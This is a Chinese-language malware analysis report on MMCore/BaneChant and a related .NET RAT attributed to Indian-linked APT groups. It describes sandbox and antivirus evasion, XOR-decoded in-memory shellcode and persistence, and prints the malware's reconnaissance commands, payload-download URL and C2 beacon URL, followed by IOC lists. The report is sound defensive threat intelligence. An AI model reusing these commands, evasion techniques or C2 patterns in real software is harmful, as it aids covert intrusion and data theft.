MMCore針對南亞地區的攻擊活動分析

一、背景介紹

MMCore是一款有趣的惡意文件，爲下載器下載後在內存中解密執行的一個惡意文件。該惡意文件也被稱爲BaneChant，最早由fireeye在2013年曝光。此外Forcepoint也在2017年初曝光過而惡意文件的一些攻擊活動。

該惡意文件的活動，主要活躍在亞洲地區，包括中國、巴基斯坦、阿富汗、尼泊爾等。不過Forcepoint也提到該攻擊活動也包含非洲和美國。攻擊的目標主要爲軍事目標、媒體、大學等。

該攻擊活動可以追溯到2013年，直到2020年，依然存在。雖然技術上並未發生太大的改變，但也存在一些有趣的變化。此外在歸屬上，我們認爲該惡意文件跟印度的一些APT攻擊組織有關聯，包括白象、蔓靈花、孔夫子等，此外我們還意外的發現了一個未被曝光過的攻擊武器，一個.net的RAT。

 

二、攻擊技術分析

分析的緣起爲一個twitter某個安全研究員的帖子：

雖然我們曾經無數次抓獲過該種類樣本，也曾經多次在攻擊活動中發現過該惡意文件的存在，但是一直並未系統的分析和追溯過該惡意文件。因此這次我們決定深入的來跟蹤一下這款有趣的惡意文件。

1.MMCore loader分析

我們以下面文件爲例進行分析：

整體功能：

對抗沙箱：首先獲取最前端窗口，隨後每隔1秒鐘檢測最前端端口是否發生變化，如果不變則無限循環檢測：

殺軟檢測：檢測snxhk.dll模塊（安全廠商Avast的相關文件），如果有則延時2分鐘：

解密下載URL，然後下載並內存執行：

存儲方式：

解密後：

下載執行：

shellcode位於偏移+0x14位置：

 

2.MMCore分析

首先檢測"avp"、"bdagent"兩個殺軟進程，如果找到則退出：

然後使用兩輪xor，解密得到一個dll：

解密得到的dll具有自加載能力：

dllmain中首先判斷加載的進程是否爲rundll32.exe，不是則執行木馬安裝操作：

然後進行install，首先定位自身._code區段，該區段存放了一個PE文件：

將PE文件釋放到C:\ProgramData\DailyUpdate\opendrive64.dll：

在啓動目錄下釋放OneDrive(2).lnk文件實現持久化，該lnk快捷方式指向rundll32.exe加載C:\ProgramData\DailyUpdate\opendrive64.dll並調用其IntRun函數：

啓動rundll32.exe加載C:\ProgramData\DailyUpdate\opendrive64.dll並調用其IntRun函數：

該文件功能與loader相似，主要功能爲從dailysync.zapto.org/fancycumti/combidation/scale.jpg上拉取payload並加載，確保payload本身無文件落地，每次木馬加載均需從網絡上拉取paylaod。其功能與loader相同，代碼相似，因此不再詳細分析。

下面開始執行真正的惡意payload。

首先創建Mutex 44cbdd8d470e88800e6c32bd9d63d341 防止重複運行：

執行命令收集獲取信息，並將獲取的信息上傳到C&C服務器：

cmd.exe  /q /c tasklist

cmd.exe /q /c ipconfig /all

cmd.exe /q /c dir C:\\

cmd.exe /q /c dir D:\\

cmd.exe /q /c dir E:\\

cmd.exe /q /c dir F:\\

cmd.exe /q /c dir G:\\

cmd.exe /q /c dir H:\\

收集的信息會保存在臨時木馬下，nnp[4位隨機].tmp：

隨後會讀取到內存中，再刪除該文件，再獲取一些其他的信息後進行拼接，拼接後的信息如下：

之後開始跟C&C服務器通信：

獲取指令，根據不同指令執行以下操作：

 

命令和功能對應關係如下表：

 

三、變化歷程和總結

從我們的樣本庫裏檢索出大量MMcore的樣本，針對這些樣本我們進行了歸納分析，發現了一些有趣的規律，總結如下：

1.得名的由來

該惡意文件第一次被稱爲MMcore爲國外安全公司Forcepoint的一篇分析報告，但是該文章並未解釋得名的由來。經過我們的跟蹤發現，最初版本的MMcore中，其互斥量的取名爲" MM-Core-Running "，因此我們猜測，Forcepoint因此而給該惡意文件取名爲MMCore：

此後，作者對該互斥名進行了一些混淆和變化，如M1M-C1o1r1e-R1u1n1n1i1n1g1：

直至現在，已經完全沒有MMCore的影子了：

 

2.標記的變更

此外，從上面的MMCore的詳細分析中，可以發現該惡意文件存在明顯的版本和版本標籤：

我們羅列一下發現的樣本標籤和版本信息，具體信息如下：

可以發現，標籤隨着時間的變化而變化，目前最新的版本號爲2.5，標籤名爲FreshPass。

3.解密算法的和編碼

MMCore的一大特色就是把shellcode存放在下載回來的jpg文件中，雖然有些jpg已經完全沒有了jpg的標識：

Shellcode的編碼主要有兩種，Shikata ga nai和普通的編碼。Shikata ga nai編碼爲常用的一種躲避殺軟檢測的編碼，海蓮花中的shellcode也多采用該編碼。

 

單次xor解密：

 

兩次xor解密：

多次xor解密：

 

1. C&C服務器的偏愛

MMCore的攻擊團伙比較偏愛動態域名，使用的動態域名包括有ddns.net、zapto.org、no-ip.org、redirectme.net等，部分信息總結如下表：

 

四、攻擊歸屬

騰訊安全御見威脅情報中心曾經在2019年發佈過一篇文章《疑似白象組織針對巴基斯坦、孟加拉國等南亞國家的最新攻擊活動報告》，文中就提到了MMCore部分的分析：

 

該活動的ip跟該文重點分析的白象存在重疊。

此外，也於奇安信的發佈的文章《蔓靈花（BITTER）APT組織使用InPage軟件漏洞針對巴基斯坦的攻擊及團伙關聯分析》中的RAT的分析一致：

因此我們把該惡意軟件歸屬到印度的相關組織中。雖然暫時還未清楚MMCore爲一個獨立小組還是歸屬於白象、蔓靈花、donot、孔夫子等組織中。但是可以確定的是，該些組織在某些重要的活動中，會採用MMcore惡意軟件來進行攻擊，至少說明MMCore跟這些組織共享技術。

此外還有個發現，依然是基於騰訊安全御見威脅情報中心去年的文章《疑似白象組織針對巴基斯坦、孟加拉國等南亞國家的最新攻擊活動報告》，文章中提到的白象的攻擊活動，該文件誘餌使用帶有宏的doc進行攻擊。我們同樣在庫裏發現了類似的宏文件：

PakCERT-Snapchat hacked by Pakistani Hacker Group.doc（92ee6729747e1f37dcae7b36d584760d）

而文檔釋放的惡意文件爲一個.net編寫的RAT：

該.net RAT爲之前未公開過的RAT，也爲該組織的常規攻擊武器之一。

其中文件的pdb爲：d:\KL\rav\rav\obj\Release\rav.pdb

類似的，也有其他的pdb信息爲：d:\startnew\JackSparow\WinStore\WinStore\obj\Release\WinStore.pdb

該RAT的主要功能包括：

解密C2：

解密結果爲"http://188.241.68.127/pmpk/"，拼接參數得到完整URL，執行systeminfo命令獲取系統信息拼接到url尾部，url如下

http://188.241.68.127/pmpk/blue.php?MNVal=JNENIEYOU-PC&FNVal=ConnInfo&DVal=17_

 

五、結論

APT組織的攻擊武器庫始終在進行不斷進化，包括從攻擊手段、開發工具和語言等等，也不斷會有新的攻擊武器庫被補充進來。目前曝光的一些攻擊武器庫可能僅僅只是實際攻擊中的冰山一角，但隨着跟蹤的深入以及被發現的攻擊活動越來越多，會有更多的細節被曝光出來。

此外，攻擊活動的歸屬，向來是一個比較頭疼的問題。在MMCore的歸屬上，我們尚無十足的證據來證明必然歸屬於某個組織，但是至少可以說明，它跟印度的一些組織至少存在基礎設施的重疊和攻擊武器庫的複用。這也跟印度的衆多APT組織的關係錯綜複雜相關。

我們曾不止一次分析過，蔓靈花、白象、孔夫子、donot等等組織存在一定關聯，也不排除爲同屬一個大組織。我們會繼續跟蹤該惡意文件的攻擊活動，力圖使得歸屬上更加清晰。

 

六、安全建議

騰訊安全威脅情報中心建議我國重要企業、政府機關對APT攻擊保持高度警惕，可參考以下建議提升信息系統的安全性：

1、建議重要機構網管培訓工作人員不要隨意打開不明來源的郵件附件，在郵件目的及發件人均未知的情況下，建議不要訪問附件。

2、建議企業用戶使用騰訊安全T-Sec終端安全管理系統修補漏洞，及時安裝系統補丁，可減少被漏洞攻擊的風險。同時注意打開Office文檔時，避免啓用宏代碼。

3、推薦企業用戶部署騰訊T-Sec高級威脅檢測系統（騰訊御界）對黑客攻擊行爲進行檢測。

騰訊T-Sec高級威脅檢測系統，是基於騰訊安全能力、依託騰訊在雲和端的海量數據，研發出的獨特威脅情報和惡意檢測模型系統，該系統可及時有效檢測黑客對企業網絡的各種入侵滲透攻擊風險。參考鏈接：https://cloud.tencent.com/product/nta

其他建議模板

 

七、附錄

1、IOCs

MMCore：

fa5ca2cba0dab28fa0fb93a9bd7b1d83   

eecbfa73955218181b0bc27c9491bd03

0647bac99b6a8407795134f5d67d4590

0932b703849364ca1537305761bc3429

9e73734ac2ab5293c0f326245658b50e

b5c1b0137181cf818a46126ca613365e

263b6c350cbf7354b99139be17c272d3

9d7953cd0e67e6ebad049faba242a74b

30e519573d04a2e1505d8daafb712406

320e29f867ae579a9db0d04e998e5459

6303059930cfb785c5cf0af1512b2cbe

5024e86b00012a202d6aa55d5502b9e0

86e3e98c1e69f887e23d119d0d30d51c

5a489fb81335a13dff52678bbce69771

9782e1f021fff363b4a6ee196e1aa9cb

a469f3f7eda824bafb8e569deb05b07d

af501dfd35e7d04afd42d9178601a143

851ea11fa3cf5ca859dacf47d066d6df

bac7c5528767d86863532bd31bdd12e2

c0baa532636ecca97de85439d7ae8cb3

eecbfa73955218181b0bc27c9491bd03

d692a057330361f8f58163f9aa7fc3a8

f946ea7d9640023d06c2751dde195eb8

03fa06ac91685e0df4c635339e297e04

0490e54e4cce81d2ab24a6e7787fa595

060d13afdb2212a717666b251feda1d3

5a477d4574983c2603c6f05ff5bae01e

7d19f3547dc900eba548ee5ceb84edae

baa12a311b9029f33c4fc6de6fde06b0

bddb10729acb2dfe28a7017b261d63db

f3a7d55ee47f2b6bdf7ed6259a6f9496

423dbab9d632a1fc318f66dfc370ac28

b692a0f56d2462ba0ec50374c653b6e8

b3286791b22f515ab8d7f8866a154e9c

2826c9c6c25368f773c0e448572585d0

1e8915ccb433ce0406a98faa94db2237

8b2b4bed6db31739686531d11c9e98aa

c4cee8d6f30127938681c93dd19f2af4

0922a6d3d9d9a774eea90853a075056e

b4db105c90d2f2659fd4e930e0b7ad5b

65067f8c60cbc4ee459641c3b704e180

 

dailysync.zapto.org

abtprinting.com

adworks.webhop.me

ichoose.zapto.org

theglobalnews24x7.com

timpisstoo.hol.es

burningforests.com

account-support.site

noitfication-office-client.890m.com

mockingbird.no-ip.org

useraccount.co

nayanew1.no-ip.org

nakamini.ddns.net

adrev22.ddns.net

hawahawai123.no-ip.biz

waterlily.ddns.net

pressnorth.net

officeopenxml.co

jospubs.com

davidjone.net

themoondelight.com

g-img.no-ip.biz

adnetwork33.redirectme.net

plansecure.org

kibber.no-ip.org

 

.net RAT:

0464acc5f3ea3d907ab9592cf5af2ff4

e223ff5a6a961a6c3ff30811e8a2ceb5

517c2c6e5e0f27f6f9c759a04a2bf612

b3a2e376a9a1f9e4d597eb8509aed57a

c69cd5894bdf4c92fcfb324e7db83ce3

f8da3eab85def2cdedd4227eec3114bb

73eb441bcf27a1ee4b1f5c1f78139b3b

5b1d7c4cea8fcb96696a6e9318d36a45

2cc9cd56b2e4c17b6b63bad4dfc5bc10

 

188.241.68.127

91.211.88.71

 

2、參考資料

https://s.tencent.com/research/report/711.html

https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/

https://www.fireeye.com/blog/threat-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html

https://www.forcepoint.com/blog/x-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose

https://twitter.com/KorbenD_Intel/status/1237121311450652672